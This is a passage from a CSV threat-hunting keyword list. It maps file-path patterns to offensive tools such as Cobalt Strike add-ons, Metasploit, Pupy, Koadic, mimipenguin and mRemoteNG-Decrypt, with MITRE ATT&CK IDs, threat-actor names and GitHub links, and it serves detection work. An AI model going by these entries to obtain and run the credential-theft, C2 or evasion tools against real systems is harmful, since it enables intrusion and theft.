T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29","C2","https://github.com/gloxec/CrossC2","1","1","N/A","10","10","1894","321","2023-08-08T20:02:44Z","2020-01-16T16:39:09Z" +"*/mimipenguin.md*","offensive_tool_keyword","metasploit","Metasploit is a widely-used. open-source framework designed for penetration testing. vulnerability assessment. and exploit development. It provides security professionals and researchers with a comprehensive platform to discover. exploit. and validate vulnerabilities in computer systems and networks. Metasploit includes a large database of pre-built exploits. payloads. and auxiliary modules that can be used to test various attack vectors. identify security weaknesses. and simulate real-world cyberattacks. By utilizing Metasploit. security teams can better understand potential threats and improve their overall security posture.","T1001 - T1021 - T1024 - T1033 - T1047 - T1075 - T1059 - T1064 - T1090 - T1204 -T1210 - T1218","TA0001 - TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0009 - TA0011 - TA0010 - TA0040","N/A","N/A","Frameworks","https://github.com/rapid7/metasploit-framework","1","1","N/A","10","10","31317","13504","2023-10-04T21:36:25Z","2011-08-30T06:13:20Z" +"*/mimipenguin/*","offensive_tool_keyword","cobaltstrike","generate CobaltStrike's cross-platform payload","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29","C2","https://github.com/gloxec/CrossC2","1","1","N/A","10","10","1894","321","2023-08-08T20:02:44Z","2020-01-16T16:39:09Z" +"*/mimipenguin/*","offensive_tool_keyword","crossc2","generate CobaltStrike's cross-platform payload","T1547.001 - T1055 - T1027 - T1105 - T1047","TA0002 - TA0005 - TA0011","N/A","N/A","C2","https://github.com/gloxec/CrossC2","1","1","N/A","10","10","1894","321","2023-08-08T20:02:44Z","2020-01-16T16:39:09Z" +"*/mimipy.py*","offensive_tool_keyword","pupy","Pupy is an opensource. cross-platform (Windows. Linux. OSX. Android) C2 and post-exploitation framework written in python and C","T1024 - T1033 - T1036 - T1055 - T1056 - T1064 - T1064.001 - T1071 - T1071.001 - T1071.002 - T1071.004 - T1071.005 - T1071.006 - T1071.007 - T1071.008 - T1071.009 - T1071.010 - T1071.012 - T1071.013 - T1071.014 - T1071.015 - T1071.016 - T1071.018 - T1086 - T1091 - T1098 - T1102 - T1105 - T1105.002 - T1113 - T1123 - T1134 - T1203 - T1573 - T1573.002 - T1573.003 - T1573.004 - T1573.005","TA0002 - TA0003 - TA0004","N/A","N/A","C2","https://github.com/n1nj4sec/pupy","1","1","N/A","10","10","7843","1826","2023-08-28T13:08:08Z","2015-09-21T17:30:53Z" +"*/mimishim/*","offensive_tool_keyword","koadic","Koadic. or COM Command & Control. is a Windows post-exploitation rootkit similar to other penetration testing tools such as Meterpreter and Powershell Empire. The major difference is that Koadic does most of its operations using Windows Script Host (a.k.a. JScript/VBScript). with compatibility in the core to support a default installation of Windows 2000 with no service packs (and potentially even versions of NT4) all the way through Windows 10.","T1021 - T1021.002 - T1024 - T1027 - T1032 - T1059 - T1070 - T1071 - T1086 - T1105 - T1112 - T1204 - T1205 - T1218","TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0008","N/A","N/A","C2","https://github.com/offsecginger/koadic","1","1","N/A","10","10","199","62","2022-01-03T01:07:01Z","2022-01-03T01:05:43Z" +"*/minidump.go*","offensive_tool_keyword","Slackor","A Golang implant that uses Slack as a command and control server","T1059.003 - T1071.004 - T1562.001","TA0002 - TA0010 - TA0011","N/A","N/A","C2","https://github.com/Coalfire-Research/Slackor","1","1","N/A","10","10","451","108","2023-02-25T03:35:15Z","2019-06-18T16:01:37Z" +"*/minimal_elf.h*","offensive_tool_keyword","cobaltstrike","This is a ELF object in memory loader/runner. The goal is to create a single elf loader that can be used to run follow on capabilities across all x86_64 and x86 nix operating systems.","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29","C2","https://github.com/trustedsec/ELFLoader","1","1","N/A","10","10","204","40","2022-05-16T17:48:40Z","2022-04-26T19:18:20Z" +"*/mirai_pass.txt*","offensive_tool_keyword","metasploit","Metasploit is a widely-used. open-source framework designed for penetration testing. vulnerability assessment. and exploit development. It provides security professionals and researchers with a comprehensive platform to discover. exploit. and validate vulnerabilities in computer systems and networks. Metasploit includes a large database of pre-built exploits. payloads. and auxiliary modules that can be used to test various attack vectors. identify security weaknesses. and simulate real-world cyberattacks. By utilizing Metasploit. security teams can better understand potential threats and improve their overall security posture.","T1001 - T1021 - T1024 - T1033 - T1047 - T1075 - T1059 - T1064 - T1090 - T1204 -T1210 - T1218","TA0001 - TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0009 - TA0011 - TA0010 - TA0040","N/A","N/A","Frameworks","https://github.com/rapid7/metasploit-framework","1","1","N/A","10","10","31317","13504","2023-10-04T21:36:25Z","2011-08-30T06:13:20Z" +"*/Misc/donut.exe*","offensive_tool_keyword","cobaltstrike","Koh is a C# and Beacon Object File (BOF) toolset that allows for the capture of user credential material via purposeful token/logon session leakage.","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29","C2","https://github.com/GhostPack/Koh","1","1","N/A","10","10","447","59","2022-07-13T23:41:38Z","2022-07-07T17:14:09Z" +"*/mitmAP*","offensive_tool_keyword","mitmAP","A python program to create a fake AP and sniff data","T1563 - T1593 - T1594 - T1567","TA0002 - TA0007 - TA0009 - TA0010","N/A","N/A","Sniffing & Spoofing","https://github.com/xdavidhu/mitmAP","1","1","N/A","N/A","10","1620","282","2019-11-03T11:34:06Z","2016-10-22T21:49:25Z" +"*/mmouse-brute.nse*","offensive_tool_keyword","nmap","Nmap NSE Scripts. Nmap Network Mapper is a free and open source utility for network discovery and security auditing","T1595 - T1592 - T1589 - T1590 - T1591 - T1190 - T1059 - T1046 - T1016 - T1049 - T1007","TA0001 - TA0002 - TA0003 - TA0006","N/A","N/A","Exploitation tools","https://svn.nmap.org/nmap/scripts/","1","1","N/A","N/A","N/A","N/A","N/A","N/A","N/A" +"*/mmouse-exec.nse*","offensive_tool_keyword","nmap","Nmap NSE Scripts. Nmap Network Mapper is a free and open source utility for network discovery and security auditing","T1595 - T1592 - T1589 - T1590 - T1591 - T1190 - T1059 - T1046 - T1016 - T1049 - T1007","TA0001 - TA0002 - TA0003 - TA0006","N/A","N/A","Exploitation tools","https://svn.nmap.org/nmap/scripts/","1","1","N/A","N/A","N/A","N/A","N/A","N/A","N/A" +"*/Mockingjay_BOF.git*","offensive_tool_keyword","cobaltstrike","Cobalt Strike Beacon Object File (BOF) Conversion of the Mockingjay Process Injection Technique","T1055.012 - T1059.001 - T1027.002","TA0002 - TA0005","N/A","N/A","C2","https://github.com/ewby/Mockingjay_BOF","1","1","N/A","9","10","32","7","2023-08-27T14:09:39Z","2023-08-27T06:01:28Z" +"*/modbus-discover.nse*","offensive_tool_keyword","nmap","Nmap NSE Scripts. Nmap Network Mapper is a free and open source utility for network discovery and security auditing","T1595 - T1592 - T1589 - T1590 - T1591 - T1190 - T1059 - T1046 - T1016 - T1049 - T1007","TA0001 - TA0002 - TA0003 - TA0006","N/A","N/A","Exploitation tools","https://svn.nmap.org/nmap/scripts/","1","1","N/A","N/A","N/A","N/A","N/A","N/A","N/A" +"*/Models/PowerShellLauncher.*","offensive_tool_keyword","covenant","Covenant is a collaborative .NET C2 framework for red teamers","T1573-001 - T1573-002 - T1573-003 - T1573-004 - T1573-005 - T1059-001 - T1059-003 - T1059-004 - T1003 - T1055 - T1036 - T1105 - T1218 - T1057 - T1574-001 - T1570-001","TA0002 - TA0003","N/A","N/A","C2","https://github.com/cobbr/Covenant","1","1","N/A","10","10","3790","733","2023-02-21T23:55:48Z","2019-02-07T15:55:18Z" +"*/Models/Regsvr32Launcher.*","offensive_tool_keyword","covenant","Covenant is a collaborative .NET C2 framework for red teamers","T1573-001 - T1573-002 - T1573-003 - T1573-004 - T1573-005 - T1059-001 - T1059-003 - T1059-004 - T1003 - T1055 - T1036 - T1105 - T1218 - T1057 - T1574-001 - T1570-001","TA0002 - TA0003","N/A","N/A","C2","https://github.com/cobbr/Covenant","1","1","N/A","10","10","3790","733","2023-02-21T23:55:48Z","2019-02-07T15:55:18Z" +"*/Models/ShellCodeLauncher.*","offensive_tool_keyword","covenant","Covenant is a collaborative .NET C2 framework for red teamers","T1573-001 - T1573-002 - T1573-003 - T1573-004 - T1573-005 - T1059-001 - T1059-003 - T1059-004 - T1003 - T1055 - T1036 - T1105 - T1218 - T1057 - T1574-001 - T1570-001","TA0002 - TA0003","N/A","N/A","C2","https://github.com/cobbr/Covenant","1","1","N/A","10","10","3790","733","2023-02-21T23:55:48Z","2019-02-07T15:55:18Z" +"*/Modlishka.git*","offensive_tool_keyword","Modlishka ","Modlishka is a powerful and flexible HTTP reverse proxy. It implements an entirely new and interesting approach of handling browser-based HTTP traffic flow. which allows to transparently proxy multi-domain destination traffic. both TLS and non-TLS. over a single domain. without a requirement of installing any additional certificate on the client.","T1090.001 - T1071.001 - T1556.001 - T1204.001 - T1568.002","TA0011 - TA0001 - TA0002 - TA0005 - TA0040","N/A","N/A","Network Exploitation Tools","https://github.com/drk1wi/Modlishka","1","1","N/A","5","10","4435","854","2023-04-10T07:30:13Z","2018-12-19T15:59:54Z" +"*/module/darkexe/*","offensive_tool_keyword","FourEye","AV Evasion Tool","T1059 - T1059.001 - T1059.005 - T1027 - T1027.005","TA0002 - TA0005","N/A","N/A","Defense Evasion","https://github.com/lengjibo/FourEye","1","0","N/A","10","8","724","154","2021-12-08T11:55:15Z","2020-12-11T01:29:58Z" +"*/Modules/Exitservice/uinit.exe*","offensive_tool_keyword","cobaltstrike","A CobaltStrike script that uses various WinAPIs to maintain permissions. including API setting system services. setting scheduled tasks. managing users. etc.","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29","C2","https://github.com/yanghaoi/CobaltStrike_CNA","1","1","N/A","10","10","403","78","2022-01-18T12:47:55Z","2021-04-21T13:10:11Z" +"*/modules/payload/*","offensive_tool_keyword","metasploit","Metasploit is a widely-used. open-source framework designed for penetration testing. vulnerability assessment. and exploit development. It provides security professionals and researchers with a comprehensive platform to discover. exploit. and validate vulnerabilities in computer systems and networks. Metasploit includes a large database of pre-built exploits. payloads. and auxiliary modules that can be used to test various attack vectors. identify security weaknesses. and simulate real-world cyberattacks. By utilizing Metasploit. security teams can better understand potential threats and improve their overall security posture.","T1001 - T1021 - T1024 - T1033 - T1047 - T1075 - T1059 - T1064 - T1090 - T1204 -T1210 - T1218","TA0001 - TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0009 - TA0011 - TA0010 - TA0040","N/A","N/A","Frameworks","https://github.com/rapid7/metasploit-framework","1","1","N/A","10","10","31317","13504","2023-10-04T21:36:25Z","2011-08-30T06:13:20Z" +"*/mongodb-brute.nse*","offensive_tool_keyword","nmap","Nmap NSE Scripts. Nmap Network Mapper is a free and open source utility for network discovery and security auditing","T1595 - T1592 - T1589 - T1590 - T1591 - T1190 - T1059 - T1046 - T1016 - T1049 - T1007","TA0001 - TA0002 - TA0003 - TA0006","N/A","N/A","Exploitation tools","https://svn.nmap.org/nmap/scripts/","1","1","N/A","N/A","N/A","N/A","N/A","N/A","N/A" +"*/mongodb-databases.nse*","offensive_tool_keyword","nmap","Nmap NSE Scripts. Nmap Network Mapper is a free and open source utility for network discovery and security auditing","T1595 - T1592 - T1589 - T1590 - T1591 - T1190 - T1059 - T1046 - T1016 - T1049 - T1007","TA0001 - TA0002 - TA0003 - TA0006","N/A","N/A","Exploitation tools","https://svn.nmap.org/nmap/scripts/","1","1","N/A","N/A","N/A","N/A","N/A","N/A","N/A" +"*/mongodb-info.nse*","offensive_tool_keyword","nmap","Nmap NSE Scripts. Nmap Network Mapper is a free and open source utility for network discovery and security auditing","T1595 - T1592 - T1589 - T1590 - T1591 - T1190 - T1059 - T1046 - T1016 - T1049 - T1007","TA0001 - TA0002 - TA0003 - TA0006","N/A","N/A","Exploitation tools","https://svn.nmap.org/nmap/scripts/","1","1","N/A","N/A","N/A","N/A","N/A","N/A","N/A" +"*/monkey.py","offensive_tool_keyword","monkey","Infection Monkey - An automated pentest tool","T1587 T1570 T1021 T1072 T1550","N/A","N/A","N/A","Exploitation tools","https://github.com/guardicore/monkey","1","1","N/A","N/A","10","6332","762","2023-10-04T21:10:48Z","2015-08-30T07:22:51Z" +"*/monkey_island.py*","offensive_tool_keyword","monkey","Infection Monkey - An automated pentest tool","T1587 T1570 T1021 T1072 T1550","N/A","N/A","N/A","Exploitation tools","https://github.com/guardicore/monkey","1","1","N/A","N/A","10","6332","762","2023-10-04T21:10:48Z","2015-08-30T07:22:51Z" +"*/MonkeyWorks.git*","offensive_tool_keyword","Tokenvator","A tool to elevate privilege with Windows Tokens","T1134 - T1078","TA0003 - TA0004","N/A","N/A","Privilege Escalation","https://github.com/0xbadjuju/Tokenvator","1","1","N/A","N/A","10","968","208","2023-02-21T18:07:02Z","2017-12-08T01:29:11Z" +"*/mouselogger.py*","offensive_tool_keyword","pupy","Pupy is an opensource. cross-platform (Windows. Linux. OSX. Android) C2 and post-exploitation framework written in python and C","T1024 - T1033 - T1036 - T1055 - T1056 - T1064 - T1064.001 - T1071 - T1071.001 - T1071.002 - T1071.004 - T1071.005 - T1071.006 - T1071.007 - T1071.008 - T1071.009 - T1071.010 - T1071.012 - T1071.013 - T1071.014 - T1071.015 - T1071.016 - T1071.018 - T1086 - T1091 - T1098 - T1102 - T1105 - T1105.002 - T1113 - T1123 - T1134 - T1203 - T1573 - T1573.002 - T1573.003 - T1573.004 - T1573.005","TA0002 - TA0003 - TA0004","N/A","N/A","C2","https://github.com/n1nj4sec/pupy","1","1","N/A","10","10","7843","1826","2023-08-28T13:08:08Z","2015-09-21T17:30:53Z" +"*/mqtt-subscribe.nse*","offensive_tool_keyword","nmap","Nmap NSE Scripts. Nmap Network Mapper is a free and open source utility for network discovery and security auditing","T1595 - T1592 - T1589 - T1590 - T1591 - T1190 - T1059 - T1046 - T1016 - T1049 - T1007","TA0001 - TA0002 - TA0003 - TA0006","N/A","N/A","Exploitation tools","https://svn.nmap.org/nmap/scripts/","1","1","N/A","N/A","N/A","N/A","N/A","N/A","N/A" +"*/mRemoteNG-Decrypt*","offensive_tool_keyword","mRemoteNG-Decrypt","Python script to decrypt passwords stored by mRemoteNG","T1589 T1003 T1563 T1552 T1098 T1021","N/A","N/A","N/A","Credential Access","https://github.com/haseebT/mRemoteNG-Decrypt","1","1","N/A","N/A","2","111","39","2023-07-06T16:15:20Z","2019-05-27T05:25:57Z" +"*/mrinfo.nse*","offensive_tool_keyword","nmap","Nmap NSE Scripts. Nmap Network Mapper is a free and open source utility for network discovery and security auditing","T1595 - T1592 - T1589 - T1590 - T1591 - T1190 - T1059 - T1046 - T1016 - T1049 - T1007","TA0001 - TA0002 - TA0003 - TA0006","N/A","N/A","Exploitation tools","https://svn.nmap.org/nmap/scripts/","1","1","N/A","N/A","N/A","N/A","N/A","N/A","N/A" +"*/Mr-Un1k0d3r/*","offensive_tool_keyword","cobaltstrike","Fileless lateral movement tool that relies on ChangeServiceConfigA to run command","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29","C2","https://github.com/Mr-Un1k0d3r/SCShell","1","1","N/A","10","10","1241","228","2023-07-10T01:31:54Z","2019-11-13T23:39:27Z" +"*/Mr-xn/cve-2022-23131*","offensive_tool_keyword","POC","POC exploitaiton of zabbix saml bypass exp vulnerability cve-2022-23131 (Unsafe client-side session storage leading to authentication bypass/instance takeover via Zabbix Frontend with configured SAML)","T1548 - T1190","TA0001 - TA0002","N/A","N/A","Exploitation tools","https://github.com/Mr-xn/cve-2022-23131","1","1","N/A","N/A","2","146","48","2022-02-24T15:02:12Z","2022-02-18T11:51:47Z" +"*/MS15-034.nse*","offensive_tool_keyword","nmap","Nmap NSE Scripts. Nmap Network Mapper is a free and open source utility for network discovery and security auditing","T1595 - T1592 - T1589 - T1590 - T1591 - T1190 - T1059 - T1046 - T1016 - T1049 - T1007","TA0001 - TA0002 - TA0003 - TA0006","N/A","N/A","Exploitation tools","https://github.com/cldrn/nmap-nse-scripts/tree/master/scripts","1","1","N/A","N/A","10","920","383","2022-01-22T18:40:30Z","2011-05-31T05:41:49Z" +"*/ms17-010.py*","offensive_tool_keyword","NetExec","NetExec (a.k.a nxc) is a post-exploitation tool that helps automate assessing the security of large Active Directory networks.","T1069 - T1021 - T1136 - T1018","TA0007 - TA0003 - TA0002 - TA0001","N/A","N/A","Credential Access","https://github.com/Pennyw0rth/NetExec","1","1","N/A","10","6","596","57","2023-10-04T00:55:43Z","2023-09-08T15:36:00Z" +"*/msf.go","offensive_tool_keyword","sliver","Sliver is an open source cross-platform adversary emulation/red team framework","T1573-001 - T1573-002 - T1573-003 - T1573-004 - T1573-005 - T1059-001 - T1059-003 - T1059-004 - T1003 - T1055 - T1036 - T1105 - T1218 - T1057 - T1574-001 - T1569-002","TA0002 - TA0003 - TA0006 - TA0009","N/A","N/A","C2","https://github.com/BishopFox/sliver","1","1","N/A","10","10","6609","921","2023-10-04T21:02:15Z","2019-01-17T22:07:38Z" +"*/msf.swf*","offensive_tool_keyword","metasploit","Metasploit is a widely-used. open-source framework designed for penetration testing. vulnerability assessment. and exploit development. It provides security professionals and researchers with a comprehensive platform to discover. exploit. and validate vulnerabilities in computer systems and networks. Metasploit includes a large database of pre-built exploits. payloads. and auxiliary modules that can be used to test various attack vectors. identify security weaknesses. and simulate real-world cyberattacks. By utilizing Metasploit. security teams can better understand potential threats and improve their overall security posture.","T1001 - T1021 - T1024 - T1033 - T1047 - T1075 - T1059 - T1064 - T1090 - T1204 -T1210 - T1218","TA0001 - TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0009 - TA0011 - TA0010 - TA0040","N/A","N/A","Frameworks","https://github.com/rapid7/metasploit-framework","1","1","N/A","10","10","31317","13504","2023-10-04T21:36:25Z","2011-08-30T06:13:20Z" +"*/msfcrawler*","offensive_tool_keyword","metasploit","Metasploit is a widely-used. open-source framework designed for penetration testing. vulnerability assessment. and exploit development. It provides security professionals and researchers with a comprehensive platform to discover. exploit. and validate vulnerabilities in computer systems and networks. Metasploit includes a large database of pre-built exploits. payloads. and auxiliary modules that can be used to test various attack vectors. identify security weaknesses. and simulate real-world cyberattacks. By utilizing Metasploit. security teams can better understand potential threats and improve their overall security posture.","T1001 - T1021 - T1024 - T1033 - T1047 - T1075 - T1059 - T1064 - T1090 - T1204 -T1210 - T1218","TA0001 - TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0009 - TA0011 - TA0010 - TA0040","N/A","N/A","Frameworks","https://github.com/rapid7/metasploit-framework","1","1","N/A","10","10","31317","13504","2023-10-04T21:36:25Z","2011-08-30T06:13:20Z" +"*/msfpc.sh*","offensive_tool_keyword","msfpc","Msfvenom is the combination of payload generation and encoding. It replaced msfpayload and msfencode on June 8th 2015.","T1027 - T1036 - T1564 - T1071 - T1059","TA0002 - TA0003 - TA0008","N/A","N/A","POST Exploitation tools","https://github.com/g0tmi1k/msfpc","1","1","N/A","N/A","10","1129","275","2021-05-09T13:16:07Z","2015-06-22T12:58:04Z" +"*/msftest/*","offensive_tool_keyword","metasploit","Metasploit is a widely-used. open-source framework designed for penetration testing. vulnerability assessment. and exploit development. It provides security professionals and researchers with a comprehensive platform to discover. exploit. and validate vulnerabilities in computer systems and networks. Metasploit includes a large database of pre-built exploits. payloads. and auxiliary modules that can be used to test various attack vectors. identify security weaknesses. and simulate real-world cyberattacks. By utilizing Metasploit. security teams can better understand potential threats and improve their overall security posture.","T1001 - T1021 - T1024 - T1033 - T1047 - T1075 - T1059 - T1064 - T1090 - T1204 -T1210 - T1218","TA0001 - TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0009 - TA0011 - TA0010 - TA0040","N/A","N/A","Frameworks","https://github.com/rapid7/metasploit-framework","1","1","N/A","10","10","31317","13504","2023-10-04T21:36:25Z","2011-08-30T06:13:20Z" +"*/msfvenom/*","offensive_tool_keyword","msfvenom","Msfvenom is the combination of payload generation and encoding. It replaced msfpayload and msfencode on June 8th 2015.","T1059.001 - T1027 - T1210.001 - T1204.002","TA0002 - TA0003 - TA0004","N/A","N/A","POST Exploitation tools","https://github.com/rapid7/metasploit-framework/wiki/How-to-use-msfvenom","1","1","N/A","10","10","31317","13504","2023-10-04T21:36:25Z","2011-08-30T06:13:20Z" +"*/msf-ws.log*","offensive_tool_keyword","metasploit","Metasploit is a widely-used. open-source framework designed for penetration testing. vulnerability assessment. and exploit development. It provides security professionals and researchers with a comprehensive platform to discover. exploit. and validate vulnerabilities in computer systems and networks. Metasploit includes a large database of pre-built exploits. payloads. and auxiliary modules that can be used to test various attack vectors. identify security weaknesses. and simulate real-world cyberattacks. By utilizing Metasploit. security teams can better understand potential threats and improve their overall security posture.","T1001 - T1021 - T1024 - T1033 - T1047 - T1075 - T1059 - T1064 - T1090 - T1204 -T1210 - T1218","TA0001 - TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0009 - TA0011 - TA0010 - TA0040","N/A","N/A","Frameworks","https://github.com/rapid7/metasploit-framework","1","1","N/A","10","10","31317","13504","2023-10-04T21:36:25Z","2011-08-30T06:13:20Z" +"*/MsgKitTestTool/*","offensive_tool_keyword","poc","Exploit for the CVE-2023-23397","T1068 - T1557.001 - T1187 - T1212 -T1003.001 - T1550","TA0003 - TA0002 - TA0004","N/A","N/A","Exploitation tools","https://github.com/sqrtZeroKnowledge/CVE-2023-23397_EXPLOIT_0DAY","1","1","N/A","N/A","2","158","46","2023-03-15T17:53:53Z","2023-03-15T17:03:38Z" +"*/Mshikaki.git*","offensive_tool_keyword","Mshikaki","A shellcode injection tool capable of bypassing AMSI. Features the QueueUserAPC() injection technique and supports XOR encryption","T1055.012 - T1116 - T1027.002 - T1562.001","TA0005 - TA0006 - TA0040 - TA0002","N/A","N/A","Exploitation tools","https://github.com/trevorsaudi/Mshikaki","1","1","N/A","9","2","103","21","2023-09-29T19:23:40Z","2023-09-03T16:35:50Z" +"*/mshta.cmd*","offensive_tool_keyword","koadic","Koadic. or COM Command & Control. is a Windows post-exploitation rootkit similar to other penetration testing tools such as Meterpreter and Powershell Empire. The major difference is that Koadic does most of its operations using Windows Script Host (a.k.a. JScript/VBScript). with compatibility in the core to support a default installation of Windows 2000 with no service packs (and potentially even versions of NT4) all the way through Windows 10.","T1021 - T1021.002 - T1024 - T1027 - T1032 - T1059 - T1070 - T1071 - T1086 - T1105 - T1112 - T1204 - T1205 - T1218","TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0008","N/A","N/A","C2","https://github.com/offsecginger/koadic","1","1","N/A","10","10","199","62","2022-01-03T01:07:01Z","2022-01-03T01:05:43Z" +"*/mshtajs.cmd*","offensive_tool_keyword","koadic","Koadic. or COM Command & Control. is a Windows post-exploitation rootkit similar to other penetration testing tools such as Meterpreter and Powershell Empire. The major difference is that Koadic does most of its operations using Windows Script Host (a.k.a. JScript/VBScript). with compatibility in the core to support a default installation of Windows 2000 with no service packs (and potentially even versions of NT4) all the way through Windows 10.","T1021 - T1021.002 - T1024 - T1027 - T1032 - T1059 - T1070 - T1071 - T1086 - T1105 - T1112 - T1204 - T1205 - T1218","TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - 